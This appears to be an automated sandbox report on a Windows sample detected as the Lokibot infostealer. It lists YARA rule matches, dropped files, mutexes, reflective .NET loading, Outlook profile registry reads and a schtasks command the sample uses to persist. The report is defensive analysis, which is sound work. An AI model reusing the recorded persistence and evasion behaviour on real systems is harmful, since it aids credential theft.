                Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@0/1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_0040650A
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,4_2_0040434D
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile created: C:\Users\user\AppData\Roaming\UieOsrSocP.exeJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeMutant created: \Sessions\1\BaseNamedObjects\pkPskRKRiL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_01
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9D57.tmpJump to behavior
                Source: 2CW1YLhNIS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                Source: 2CW1YLhNIS.exeReversingLabs: Detection: 26%
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile read: C:\Users\user\Desktop\2CW1YLhNIS.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\2CW1YLhNIS.exe 'C:\Users\user\Desktop\2CW1YLhNIS.exe'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exe
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exeJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: 2CW1YLhNIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 2CW1YLhNIS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: 2CW1YLhNIS.exeStatic file information: File size 1219072 > 1048576
                Source: 2CW1YLhNIS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x117a00
                Source: 2CW1YLhNIS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                barindex
                .NET source code contains potential unpackerShow sources
                Source: 2CW1YLhNIS.exe, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: UieOsrSocP.exe.0.dr, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.2CW1YLhNIS.exe.8f0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.2CW1YLhNIS.exe.8f0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.2.2CW1YLhNIS.exe.c90000.1.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.0.2CW1YLhNIS.exe.c90000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
                Source: Yara matchFile source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_008F63F7 push 00000028h; retf 0000h0_2_008F661B
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B7043B pushad ; iretd 0_2_02B70442
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA79DB push dword ptr [edx-04h]; iretd 0_2_05FA79E9
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00402AC0 push eax; ret 4_2_00402AD4
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00402AC0 push eax; ret 4_2_00402AFC
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00C963F7 push 00000028h; retf 0000h4_2_00C9661B
                Source: initial sampleStatic PE information: section name: .text entropy: 7.17424045556
                Source: initial sampleStatic PE information: section name: .text entropy: 7.17424045556
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile created: C:\Users\user\AppData\Roaming\UieOsrSocP.exeJump to dropped file

                Boot Survival:

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
